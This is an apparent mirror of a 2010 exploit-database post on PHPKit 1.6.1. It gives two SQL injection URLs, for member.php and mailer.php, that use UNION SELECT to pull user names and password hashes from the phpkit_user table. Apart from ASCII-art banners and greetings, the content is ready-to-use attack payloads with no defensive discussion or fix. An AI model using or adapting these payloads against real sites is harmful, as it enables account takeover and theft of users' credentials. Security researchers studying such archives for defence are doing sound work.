PHPKit 1.6.1 – ‘mailer.php’ SQL Injection - 体验盒子

作者： Easy Laster
日期： 2010-02-19
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/11509/
 ########################################################################
 ##Phpkit 1.6.1 SQL Injection member.php ##
 ########################################################################
 ########################################################################
 ## _ _ _ _##
 ##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_##
 ##|_| -_| .'| |___| | |_| -_|_| | -_|_| ##
 ##|_| |___|__,|_|_|_| |_|_|_|_| |___|_| |_|_|___|_| ##
 ####
 ########################################################################
##########################################################################
#Script: Phpkit 1.6.1 SQL Injection member.php #
#Vulnerabilities [ SQL Injection ] #
#Language: [ PHP ] #
#Download: [ this script is for free]#
#Founder: [ ea$y laster ]#
#Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ]#
#[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-] #
#############################################################################
/include.php?path=login/member.php&searchstr=+union+select+1,1,1,1,1,1, #
concat(user_name,0x3a,user_pw),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, #
1,1,1,1,1,1,1,1+from+phpkit_user+where+user_id=2# #
############################################################################# 

 ########################################################################
 ##Phpkit 1.6.1 SQL Injection mailer.php ##
 ########################################################################
 ########################################################################
 ## _ _ _ _##
 ##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_##
 ##|_| -_| .'| |___| | |_| -_|_| | -_|_| ##
 ##|_| |___|__,|_|_|_| |_|_|_|_| |___|_| |_|_|___|_| ##
 ####
 ########################################################################
##########################################################################
#Script: Phpkit 1.6.1 SQL Injection mailer.php #
#Vulnerabilities [ SQL Injection ] #
#Language: [ PHP ] #
#Download: [ this script is for free]#
#Discovered by : [ ea$y laster ] #
#Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ]#
#[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-] #
#############################################################################
/include.php?path=login/mailer.php&userid=+union+select+1,1,1,1,1 #
,1,concat(user_name,0x3a,user_pw),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,#
1,1,1,1,1,1,1,1,1,1,1,1,1+from+phpkit_user+where+user_id=1# #
#############################################################################